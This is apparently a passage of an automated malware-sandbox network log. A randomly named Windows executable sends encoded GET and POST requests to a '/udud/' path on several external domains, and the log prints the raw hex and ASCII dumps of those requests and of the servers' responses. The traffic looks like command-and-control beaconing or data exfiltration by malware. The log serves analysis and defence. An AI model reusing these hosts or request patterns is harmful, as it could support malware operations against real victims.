                                                                                                Data Ascii: Pl9P8ldX=eKQ+1RcYKx2Vd9p5WrvBnopPafU1eEGtBHskH+bQCwtI7sCZM2jy0sYUEAc4zm5ZWy74gyAAbO/FKvUzCZOrbkW+gNngNlWU/mUH+ZjwQne/5ZprwEBHiC4vA7r0msbdmObqVUFnn1q4h9QsFpWLAF9qqM1fnJIQ3t9vRaN961kdCKL/UWFl9+aQBuMo43rviZPLwzjrTokNrTIS+aLzagPPT/Xzs4hr1hE9mhfugqpf0XdEAEQXai1nXpqdxCNO8bXukRZXfTe078KdF21R2ReigY8cA5fQ55JFMt4mk2rJRUS5tTNNaA9ZBYDXCzkK2qdc+j/j5TaPXH/fW/R9SSXr1omWZEifD6CrCgWoj22BiI+6iGcWLyDbl9yiZGu5C6trO0+Qetdy2dsFyEBy1UMEHynxUdNI0/PxTYCgWaSwZ5HBEonHyPoAKMFF9PrsN2ez9sVHPdy3W6SJNT0irZO4AOR6mz/VBh039H05q+7PEs1vp3Px0SBmLRZr8hNTfxQigkUBhiD94M6EWCPzX9ACGVIqp4bRu4CpLGdXuGARPufebiCllz2TApmEhQ88G9I7t0B06HMlM4lCCpyuFFJngNZjuvKdzDuJCXX1SHCBP49C1y72xuKC2ndz9KyBh4eSRinSNaytnL/9BU1/tpWRoQF6Uc9yWFjKYhOQ7rF4gPnUsNZ1mVruFFMtbnux+T9QjUXjKsnhsNqeply7kUiux1GkFAkpxZoyOG8NJvIHuG+gtpuY3vaGgzgJeInnyPYxA6xgQN1hBwUXWsrAS1zY+WMvGnpYW/4OfNFx2Xj72Iph+VYLRJX+z46XERO+kIT07YduMrbEPICY3qggf52E/zZG0rQ0ZRZu9aTSqzLkLNIs146wrhwIaBA5aJrlgfnQEpnmqa2ywOth4gGlrq39GXbqzJ3ZT/Ot0yAx4afSflDkdmXRzp86MzIozc7lTtu6jXx/FN9PYXMaDyyvuHAAbpLOohD9EpLULB8VcwG [TRUNCATED]
                                                                                                May 27, 2024 12:35:14.700639009 CEST701INHTTP/1.1 405 Not Allowed
                                                                                                date: Mon, 27 May 2024 10:35:14 GMT
                                                                                                content-type: text/html
                                                                                                content-length: 556
                                                                                                server: NginX
                                                                                                connection: close
                                                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 [TRUNCATED]
                                                                                                Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>openresty</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                57192.168.11.304988764.190.62.22807584C:\Program Files (x86)\qUiDoputyglQzVYibDRasYiPLhrIcQavufTxYIuNXmAUmzqYssSJmsSX\jbBlvVPHmIIgIHiOBCnstGcDCWhN.exe
                                                                                                TimestampBytes transferredDirectionData
                                                                                                May 27, 2024 12:35:17.225872040 CEST486OUTGET /udud/?Pl9P8ldX=TI4e2mgRGjDzVtc2Q6Py5bwpcc1eb12gZ0duId/eBRBY8c2YNmrJo+kJDCAf1WNWS12prRY8Wfa6UPEwF5qWDHqXkvXCbknW9nAX9azEcXWIpZdV+y5+rBk=&UJ2H=ED2dW8S8UxwlG HTTP/1.1
                                                                                                Host: www.donantedeovulos.space
                                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                Connection: close
                                                                                                User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
                                                                                                May 27, 2024 12:35:17.449994087 CEST1289INHTTP/1.1 200 OK
                                                                                                date: Mon, 27 May 2024 10:35:17 GMT
                                                                                                content-type: text/html; charset=UTF-8
                                                                                                transfer-encoding: chunked
                                                                                                vary: Accept-Encoding
                                                                                                x-powered-by: PHP/8.1.17
                                                                                                expires: Mon, 26 Jul 1997 05:00:00 GMT
                                                                                                cache-control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                                pragma: no-cache
                                                                                                x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANnylWw2vLY4hUn9w06zQKbhKBfvjFUCsdFlb6TdQhxb9RXWXuI4t31c+o8fYOv/s8q1LGPga3DE1L/tHU4LENMCAwEAAQ==_bZQwM6rcoDWKKpVAXhX2tlV84V3PyO17BuINdDXE3PQlpZg9Kg6Hnhi5jqSBqYmWFVUdTNJQtasOr6lulaA+uQ==
                                                                                                last-modified: Mon, 27 May 2024 10:35:17 GMT
                                                                                                x-cache-miss-from: parking-54698f55d6-pm56b
                                                                                                server: NginX
                                                                                                connection: close
                                                                                                Data Raw: 32 43 45 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 6e 79 6c 57 77 32 76 4c 59 34 68 55 6e 39 77 30 36 7a 51 4b 62 68 4b 42 66 76 6a 46 55 43 73 64 46 6c 62 36 54 64 51 68 78 62 39 52 58 57 58 75 49 34 74 33 31 63 2b 6f 38 66 59 4f 76 2f 73 38 71 31 4c 47 50 67 61 33 44 45 31 4c 2f 74 48 55 34 4c 45 4e 4d 43 41 77 45 41 41 51 3d 3d 5f 62 5a 51 77 4d 36 72 63 6f 44 57 4b 4b 70 56 41 58 68 58 32 74 6c 56 38 34 56 33 50 79 4f 31 37 42 75 49 4e 64 44 58 45 33 50 51 6c 70 5a 67 39 4b 67 36 48 6e 68 69 35 6a 71 53 42 71 59 6d 57 46 56 55 64 54 4e 4a 51 74 61 73 4f 72 36 6c 75 6c 61 41 2b 75 51 3d 3d 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 3c 74 69 74 6c 65 3e 64 6f 6e 61 6e 74 65 64 65 6f 76 75 6c 6f 73 2e 73 70 61 63 65 26 6e 62 73 70 3b 2d 26 6e 62 73 [TRUNCATED]
                                                                                                Data Ascii: 2CE<!DOCTYPE html><html lang="en" data-adblockkey=MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANnylWw2vLY4hUn9w06zQKbhKBfvjFUCsdFlb6TdQhxb9RXWXuI4t31c+o8fYOv/s8q1LGPga3DE1L/tHU4LENMCAwEAAQ==_bZQwM6rcoDWKKpVAXhX2tlV84V3PyO17BuINdDXE3PQlpZg9Kg6Hnhi5jqSBqYmWFVUdTNJQtasOr6lulaA+uQ==><head><meta charset="utf-8"><title>donantedeovulos.space&nbsp;-&nbsp;donantedeovulos Resources and Information.</title><meta name="viewport" content="width=device-width,initial-scale=1.0,maximum-scale=1.0,user-scalable=0"><meta name="description" content="donantedeovulos.space is your first and best source for all of the information youre looki
                                                                                                May 27, 2024 12:35:17.450010061 CEST1289INData Raw: 6e 67 20 66 6f 72 2e 20 46 72 6f 6d 20 67 65 6e 65 72 61 6c 20 74 6f 70 69 63 73 20 74 6f 20 6d 6f 72 65 20 6f 66 20 77 68 61 74 20 79 6f 75 20 77 6f 75 6c 64 20 65 78 70 65 63 74 20 74 6f 20 66 69 6e 64 20 68 65 72 65 2c 20 64 6f 6e 61 6e 74 65
                                                                                                Data Ascii: ng for. From general topics to more of what you would expect to find here, donantedeovulos.space has itAEC all. We hope you find what you are searching for!"><link rel="icon" type="image/png" href="//img.sedoparking
                                                                                                May 27, 2024 12:35:17.450089931 CEST1289INData Raw: 6f 6f 74 29 7b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 62 75 74 74 6f 6e 2c 69 6e 70 75 74 2c 6f 70 74 67 72 6f 75 70 2c 73 65 6c 65 63 74 2c 74 65 78 74 61 72 65 61 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 73 61 6e 73 2d 73 65 72 69 66 3b
                                                                                                Data Ascii: oot){overflow:hidden}button,input,optgroup,select,textarea{font-family:sans-serif;font-size:100%;line-height:1.15;margin:0}button,input{overflow:visible}button,select{text-transform:none}button,html [type=button],[type=reset],[type=submit]{-we
                                                                                                May 27, 2024 12:35:17.450105906 CEST1289INData Raw: 6e 6f 75 6e 63 65 6d 65 6e 74 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 32 37 33 39 34 38 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 70 61 64 64 69 6e 67 3a 30 20 35 70 78 7d 2e 61 6e 6e 6f 75 6e 63 65 6d 65 6e 74 20 70 7b 63 6f 6c 6f
                                                                                                Data Ascii: nouncement{background:#273948;text-align:center;padding:0 5px}.announcement p{color:#848484}.announcement a{color:#848484}.container-header{margin:0 auto 0 auto;text-align:center}.container-header__content{color:#848484}.container-buybox{text-
                                                                                                May 27, 2024 12:35:17.450126886 CEST1289INData Raw: 69 6e 65 72 2d 69 6d 70 72 69 6e 74 5f 5f 63 6f 6e 74 65 6e 74 2d 74 65 78 74 2c 2e 63 6f 6e 74 61 69 6e 65 72 2d 69 6d 70 72 69 6e 74 5f 5f 63 6f 6e 74 65 6e 74 2d 6c 69 6e 6b 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 30 70 78 3b 63 6f 6c 6f 72 3a 23
                                                                                                Data Ascii: iner-imprint__content-text,.container-imprint__content-link{font-size:10px;color:#949494}.container-contact-us{text-align:center}.container-contact-us__content{display:inline-block}.container-contact-us__content-text,.container-contact-us__con
                                                                                                May 27, 2024 12:35:17.450149059 CEST1289INData Raw: 3b 2d 6d 6f 7a 2d 74 72 61 6e 73 69 74 69 6f 6e 3a 61 6c 6c 20 2e 33 73 3b 74 72 61 6e 73 69 74 69 6f 6e 3a 61 6c 6c 20 2e 33 73 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 7d 2e 63 6f 6f 6b 69 65 2d 6d 6f 64 61 6c 2d 77 69 6e 64 6f 77
                                                                                                Data Ascii: ;-moz-transition:all .3s;transition:all .3s;text-align:center}.cookie-modal-window__content-header{font-size:150%;margin:0 0 15px}.cookie-modal-window__content{text-align:initial;margin:10% auto;padding:40px;background:#fff;display:inline-bloc
                                                                                                May 27, 2024 12:35:17.450166941 CEST1289INData Raw: 64 65 72 2d 63 6f 6c 6f 72 3a 23 37 32 37 63 38 33 3b 63 6f 6c 6f 72 3a 23 66 66 66 3b 66 6f 6e 74 2d 73 69 7a 65 3a 6d 65 64 69 75 6d 7d 2e 62 74 6e 2d 2d 73 65 63 6f 6e 64 61 72 79 2d 73 6d 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a
                                                                                                Data Ascii: der-color:#727c83;color:#fff;font-size:medium}.btn--secondary-sm{background-color:#8c959c;border-color:#8c959c;color:#fff;font-size:initial}.btn--secondary-sm:hover{background-color:#727c83;border-color:#727c83;color:#fff;font-size:initial}.sw
                                                                                                May 27, 2024 12:35:17.450181007 CEST1289INData Raw: 74 3a 31 30 30 25 3b 6d 61 72 67 69 6e 3a 30 20 61 75 74 6f 20 21 69 6d 70 6f 72 74 61 6e 74 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 2e 63 6f 6e 74 61 69 6e 65 72 2d 63 6f 6e 74 65 6e 74 5f 5f 63 6f 6e 74 61 69 6e 65 72 2d 72 65 6c 61
                                                                                                Data Ascii: t:100%;margin:0 auto !important;overflow:hidden}.container-content__container-relatedlinks,.container-content__container-ads,.container-content__webarchive{width:30%;display:inline-block}.container-content__container-relatedlinks{margin-top:7%
                                                                                                May 27, 2024 12:35:17.450192928 CEST1289INData Raw: 61 69 6e 65 72 2d 63 6f 6e 74 65 6e 74 5f 5f 6c 65 66 74 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 70 6f 73 69 74 69 6f 6e 2d 79 3a 74 6f 70 7d 2e 63 6f 6e 74 61 69 6e 65 72 2d 63 6f 6e 74 65 6e 74 2d 2d 74 77 6f 74 20 2e 63 6f 6e 74 61 69 6e 65 72 2d
                                                                                                Data Ascii: ainer-content__left{background-position-y:top}.container-content--twot .container-content__right{background-position-y:top}.container-content--wa .container-content__left{background-position-y:top}.container-content--wa .container-content__rig
                                                                                                May 27, 2024 12:35:17.450206041 CEST1289INData Raw: 65 2d 62 6c 6f 63 6b 5f 5f 6c 69 73 74 7b 70 61 64 64 69 6e 67 3a 30 7d 2e 77 65 62 61 72 63 68 69 76 65 2d 62 6c 6f 63 6b 5f 5f 6c 69 73 74 2d 65 6c 65 6d 65 6e 74 7b 77 6f 72 64 2d 77 72 61 70 3a 62 72 65 61 6b 2d 77 6f 72 64 3b 6c 69 73 74 2d
                                                                                                Data Ascii: e-block__list{padding:0}.webarchive-block__list-element{word-wrap:break-word;list-style:none}.webarchive-block__list-element-link{line-height:30px;font-size:20px;color:#9fd801}.webarchive-block__list-element-link:link,.webarchive-block__list-e
                                                                                                May 27, 2024 12:35:17.639565945 CEST1289INData Raw: 22 2c 22 73 65 61 72 63 68 50 61 72 61 6d 73 22 3a 7b 22 73 65 73 22 3a 22 59 33 4a 6c 50 54 45 33 4d 54 59 34 4d 44 59 78 4d 54 63 6d 64 47 4e 70 5a 44 31 33 64 33 63 75 5a 47 39 75 59 57 35 30 5a 57 52 6c 62 33 5a 31 62 47 39 7a 4c 6e 4e 77 59
                                                                                                Data Ascii: ","searchParams":{"ses":"Y3JlPTE3MTY4MDYxMTcmdGNpZD13d3cuZG9uYW50ZWRlb3Z1bG9zLnNwYWNlNjY1NDYxZTU1MzI1YTIuMTQ1OTQ4MDgmdGFzaz1zZWFyY2gmZG9tYWluPWRvbmFudGVkZW92dWxvcy5zcGFjZSZhX2lkPTEmc2Vzc2576lvbj1DSC1FQUpPME4wWkdJNVk2S1ZaZiZ0cmFja3F1ZXJ5PTE


                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                58192.168.11.30498883.73.27.108807584C:\Program Files (x86)\qUiDoputyglQzVYibDRasYiPLhrIcQavufTxYIuNXmAUmzqYssSJmsSX\jbBlvVPHmIIgIHiOBCnstGcDCWhN.exe
                                                                                                TimestampBytes transferredDirectionData
                                                                                                May 27, 2024 12:35:22.847505093 CEST763OUTPOST /udud/ HTTP/1.1
                                                                                                Host: www.valentinaetommaso.it
                                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                Origin: http://www.valentinaetommaso.it
                                                                                                Referer: http://www.valentinaetommaso.it/udud/
                                                                                                Content-Length: 205
                                                                                                Cache-Control: max-age=0
                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                Connection: close
                                                                                                User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
                                                                                                Data Raw: 50 6c 39 50 38 6c 64 58 3d 73 45 74 36 59 73 6c 78 48 41 76 6e 79 50 43 38 6c 50 73 35 52 76 32 46 41 58 64 50 38 6a 4c 42 30 52 46 2f 48 6e 44 36 2f 6b 77 76 56 6d 67 6f 77 55 4f 4e 41 57 33 4f 70 4d 35 69 74 47 36 54 6e 74 55 35 52 36 68 70 77 67 69 70 6d 42 4a 53 7a 4c 51 76 34 45 32 6b 72 64 52 6d 37 51 41 4e 30 48 6a 44 4e 63 69 73 67 63 32 35 48 6a 77 57 72 53 2f 65 53 4d 6c 55 75 6d 68 78 4f 37 6b 77 39 69 38 4e 69 57 38 4c 69 56 46 33 55 53 56 41 32 61 48 71 6e 66 34 49 63 66 42 44 63 2f 34 79 71 32 56 37 72 6b 37 72 59 4d 55 75 62 5a 6b 4d 32 5a 68 38 41 7a 77 75 41 2b 42 31 6f 76 75 73 52 77 3d 3d
                                                                                                Data Ascii: Pl9P8ldX=sEt6YslxHAvnyPC8lPs5Rv2FAXdP8jLB0RF/HnD6/kwvVmgowUONAW3OpM5itG6TntU5R6hpwgipmBJSzLQv4E2krdRm7QAN0HjDNcisgc25HjwWrS/eSMlUumhxO7kw9i8NiW8LiVF3USVA2aHqnf4IcfBDc/4yq2V7rk7rYMUubZkM2Zh8AzwuA+B1ovusRw==
                                                                                                May 27, 2024 12:35:23.132189035 CEST1289INHTTP/1.1 404 Not Found
                                                                                                Server: openresty
                                                                                                Date: Mon, 27 May 2024 10:35:23 GMT
                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                Transfer-Encoding: chunked
                                                                                                Connection: close
                                                                                                Set-Cookie: PHPSESSID=gbiispvjbljgmcrojhkjce820d; path=/; domain=valentinaetommaso.it; HttpOnly
                                                                                                Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                Cache-Control: no-store, no-cache, must-revalidate
                                                                                                Pragma: no-cache
                                                                                                Content-Encoding: gzip
                                                                                                Data Raw: 33 37 39 34 0d 0a 1f 8b 08 00 00 00 00 00 04 03 ed 7d 6d 77 db c6 92 e6 e7 9b 73 e6 3f 20 dc b9 b9 d2 46 04 5f 25 8a b2 e8 ac 22 cb b1 76 2c 5b d7 92 93 b9 d7 f6 f0 80 20 48 22 26 01 06 00 25 cb 8e 7f d8 7e de 3f b6 cf 53 dd 0d 34 f8 22 d1 4e e6 cc 7c 58 1f 4b 02 d1 dd d5 d5 d5 d5 55 d5 d5 55 cd e3 6f 9f bc 3c bd fe c7 e5 99 33 c9 66 d3 c7 df 1c f3 8f e3 4f bd 34 ed 55 a2 b8 fa 6b 5a 71 e6 49 30 0a 3f f4 2a f1 f8 08 b5 b2 79 7a 54 ab c5 e3 b9 3b 0b 6a 51 fa 3f 2a ce d4 8b c6 bd 4a 98 55 d8 3c f0 86 8f 8f a7 61 f4 de 49 82 69 af 82 b6 7e 1c 45 81 9f 55 9c 09 e0 f4 2a 06 c2 b0 31 0c 9b d3 8f 8b 49 b7 33 9a 34 5d 7f 1a 2f 86 a3 24 8e 32 37 0a 50 d9 4f e2 34 8d 93 70 1c 46 db c1 1b a1 69 ea 8e d3 cc cb 42 df f5 e3 d9 12 8c 59 90 79 8e 3f f1 92 34 c8 7a 95 45 36 aa 1e 56 6c c8 21 f0 fc 22 1c 6b a3 70 1a a4 b5 e6 10 ff 43 fe dc b4 26 6e 7a 33 fe 61 3e e9 f9 83 96 d7 39 0c ba fb 9d 8a 93 dd cd 03 90 67 e6 8d 83 1a 8a bf ff 30 9b 56 9c 34 fc 18 80 c2 5e 74 f7 a7 20 51 ef d4 ea 9d 11 7f 3e fe 76 f8 a5 48 34 [TRUNCATED]
                                                                                                Data Ascii: 3794}mws? F_%"v,[ H"&%~?S4"N|XKUUo<3fO4UkZqI0?*yzT;jQ?*JU<aIi~EU*1I34]/$27PO4pFiBYy?4zE6Vl!"kpC&nz3a>9g0V4^t Q>vH4>449-lz{4fT_Z8w,E-^Ol~Lp#4{g`8\efqv~(,o<3$Q7S@ g3/kDo7ap;$m8&apAU>Qkd0,D>FGW'x2:MSY_*k?8`z'aE$[ZkS?3#EF*Z3XU/mt%bRZ-F5"![ju}aJhiS>%w'Qj28|1Y<7lGZk'k!7Bh:-^E+'|rg(qVQ7&m0X9<{{idN2<'ow0uCXW/{Q7
                                                                                                May 27, 2024 12:35:23.132267952 CEST1289INData Raw: c5 0c 3a c3 fd 6d 11 24 77 57 c1 14 a6 58 9c 9c 4c a7 3b 7f a3 ad e6 3c 76 28 34 df 50 62 ff cf 5e 05 82 b7 f2 ee 8d 96 b5 f7 2f e2 77 7f db 7d 14 1c 67 2e 14 d2 38 9b 3c 0a be ff 7e 37 7b 13 bc 73 93 60 16 df 04 27 19 54 d6 60 91 05 3b 15 23 f4
                                                                                                Data Ascii: :m$wWXL;<v(4Pb^/w}g.8<~7{s`'T`;#*lgwOcf:z1Hv*I@U+a#1gSeLDx-Ke1QuI@ze$NEr2$w0"@]0vwvs
                                                                                                May 27, 2024 12:35:23.132400036 CEST1289INData Raw: 9c c2 d5 c8 c5 3b 8e e3 31 ac 62 6f 3c f3 22 8c 2e a1 87 10 ee 4b 97 fe ce 1f c2 61 ef a7 eb 8b ea 7e bb 79 71 71 f5 bc a2 40 4c 02 3a 39 7a e0 1b f5 59 b9 4f f2 8f a2 c4 7a b4 6e c1 f1 77 47 90 1b c1 a3 9b 30 0d a1 2b c3 ec ee 68 12 0e 87 41 a4
                                                                                                Data Ascii: ;1bo<".Ka~yqq@L:9zYOznwG0+hA>VkEx\+?L,?~ZU'F~H3*SU]%UnTxP'hR@*"hwcf_fY5209];\h:1X5`5PN
                                                                                                May 27, 2024 12:35:23.132462978 CEST1289INData Raw: ab a3 30 49 95 e1 aa 84 75 09 81 51 d5 97 b5 61 99 7f 61 e6 0c e4 54 49 ad 5b 5b c9 86 d8 c1 54 1e 9f 3f 77 2e 4e ae 5f 9d 5f bc 7c 71 fe d2 79 72 ee 6c b6 06 95 11 08 96 53 26 16 ba 36 18 2f 91 ff 6b f0 b8 5e 64 19 9c eb f0 dc c3 b9 8e a7 24 84
                                                                                                Data Ascii: 0IuQaaTI[[T?w.N__|qyrlS&6/k^d$Aw ?sQ/X1(Xt?aCTduK&B:rKHJq;)H#)DNnpE6"n;~AbSWNzM1K$IBrK<UpcX:[2tnv1
                                                                                                May 27, 2024 12:35:23.132535934 CEST1289INData Raw: 03 74 c3 75 4d 89 07 11 23 c8 08 62 6d fd dc 70 81 80 5e 3d 55 08 4f 3d 28 ce 37 c5 0f ea b6 3a 10 cf 90 c1 4d f0 c5 61 b3 29 18 1e a8 67 10 53 96 07 a6 88 b4 16 5a 92 d6 3f 73 96 b1 a2 73 62 73 10 24 32 b0 50 d4 06 19 01 96 c2 a4 db 66 3b 88 4a
                                                                                                Data Ascii: tuM#bmp^=UO=(7:Ma)gSZ?ssbs$2Pf;J(w[.xC1FK:4s,R+B|8UO!@(r-M}3.^\<Flz}6]>OW/+bhA*Qg^NSuV+qFeOGz;Xup-H
                                                                                                May 27, 2024 12:35:23.132658958 CEST1289INData Raw: 7e f6 f2 f5 75 ff e7 93 eb ca d1 c8 9b a6 c1 5e 65 43 83 93 27 4f ce af cf 5f be 38 79 be 4d ed ab 67 e7 97 97 e8 b0 7f fa f2 ca 80 06 c2 08 ae ff 15 eb ab cf 18 0e 61 c3 f4 82 d2 84 42 6e c1 38 1b 83 43 a8 de 63 13 05 fb ce bf cb df cb e8 fa 99
                                                                                                Data Ascii: ~u^eC'O_8yMgaBn8CcD94$|l;M:}1g/hm^#Gb_=Gsq~[{[[6&~r SC?zU0q%"`-o<n5g)c$i D_$jzTf:^k%
                                                                                                May 27, 2024 12:35:23.132694006 CEST1289INData Raw: d2 25 4c cf b8 1d c9 3f 4f bc 14 02 74 9c 7f 0e d3 4b c5 14 4f 40 b9 70 6a bd 67 de 3d c4 f8 d2 7b 3d ce be a2 3a b7 3b 80 28 5d 9c c0 33 7c 07 0b b1 10 52 e3 6b 4f a6 4a 51 6e 7c 32 4c 39 71 86 d0 4c cc 26 93 0f 44 9d 3f 39 b9 3e eb 5f 9f 5f 9c
                                                                                                Data Ascii: %L?OtKO@pjg={=:;(]3|RkOJQn|2L9qL&D?9>__n$zuu_RoHMcNrAo5}4Imq[9M|h=}nM~iN]uA)"hiwwjxi`W^SeP
                                                                                                May 27, 2024 12:35:23.132769108 CEST1289INData Raw: 74 9c 9d 14 17 97 ed 62 16 bd d4 91 be 60 3e a0 0f 2f c6 34 7a 90 80 e8 66 31 f5 92 9c e0 0f 8f 9f e3 86 77 81 8e 13 43 8a fb 46 ad e7 22 41 24 26 46 c5 71 cc f2 e1 0d e3 59 e8 23 b6 0b fd 3b 27 f9 db 62 a4 08 0d 03 13 62 a0 b8 89 d8 1b cb f0 11
                                                                                                Data Ascii: tb`>/4zf1wCF"A$&FqY#;'bbB`v;w1qcC0E-EJ\2$84a+%e\*SJ]1Qg4uj4x#,P*Dk"#9}2_h,7w{kP}j7B>|/Jr>/9q$
                                                                                                May 27, 2024 12:35:23.132927895 CEST1289INData Raw: 1e 14 7d 37 c3 86 6d f1 25 d8 3f 60 a5 be 86 be a0 9d 03 61 fe 72 41 b6 3d 83 b1 a4 09 8f 48 7a 1e e7 ab 43 fa 4b 58 41 ff 04 6e f8 e6 2b 11 bb 2f 16 f1 0d 5c b9 30 44 ee ad 3d 4f f0 55 3e 4c 18 81 5a 46 5d 58 21 c8 3e 94 58 bc a2 19 7c 24 e6 1c
                                                                                                Data Ascii: }7m%?`arA=HzCKXAn+/\0D=OU>LZF]X!>X|$Jw~0C}F-1]j }:]$[o(Zdz`}I"A1$2N7~Sv7&:S5E4;8]m)ODfZWXELJ
                                                                                                May 27, 2024 12:35:23.133050919 CEST1289INData Raw: 96 fa 20 9a af 02 78 c5 99 0b 5a b9 c0 66 09 33 69 36 6f 70 b3 a2 00 f1 a3 eb bb e3 37 f4 6a 11 70 ca af 45 db 50 8b d7 7f 5c 16 bb 58 32 2d 6b e3 c6 83 f5 0d 70 10 e1 4f ce 23 8b 78 e7 76 c2 da 89 f6 ef 70 fb 2b 8e 79 31 3f 73 1f fa f9 93 33 7c
                                                                                                Data Ascii: xZf3i6op7jpEP\X2-kpO#xvp+y1?s3|OWQ[Llu=M7_vE (%3{V{?*3YPIgKopQ_<0K#F+:CCN[jiAKpPxU]dak!`8^Xy0d
                                                                                                May 27, 2024 12:35:23.319077969 CEST1289INData Raw: 62 48 f1 fd a1 62 94 0b 46 a8 bd c0 81 1b ee a8 5b aa ff 5a de ae 6f 01 9f 6b 92 f5 71 93 87 34 c2 37 98 cc 06 b8 17 80 47 30 16 72 57 ac 84 9c 50 54 93 f1 3b 17 52 cd 39 61 35 85 27 82 d6 1f 82 72 86 1b f8 ee 85 01 f3 fa b6 2f 91 62 72 b9 cc 0a
                                                                                                Data Ascii: bHbF[Zokq47G0rWPT;R9a5'r/brUab$y[)^IP<ncFck%\H,!!a)PM7Ziz-3O^1RDTW*#Bl1>R2]G,&>p_p6{ScL-]!


                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                59192.168.11.30498893.73.27.108807584C:\Program Files (x86)\qUiDoputyglQzVYibDRasYiPLhrIcQavufTxYIuNXmAUmzqYssSJmsSX\jbBlvVPHmIIgIHiOBCnstGcDCWhN.exe
                                                                                                TimestampBytes transferredDirectionData
                                                                                                May 27, 2024 12:35:25.568823099 CEST783OUTPOST /udud/ HTTP/1.1
                                                                                                Host: www.valentinaetommaso.it
                                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                Origin: http://www.valentinaetommaso.it
                                                                                                Referer: http://www.valentinaetommaso.it/udud/
                                                                                                Content-Length: 225
                                                                                                Cache-Control: max-age=0
                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                Connection: close
                                                                                                User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
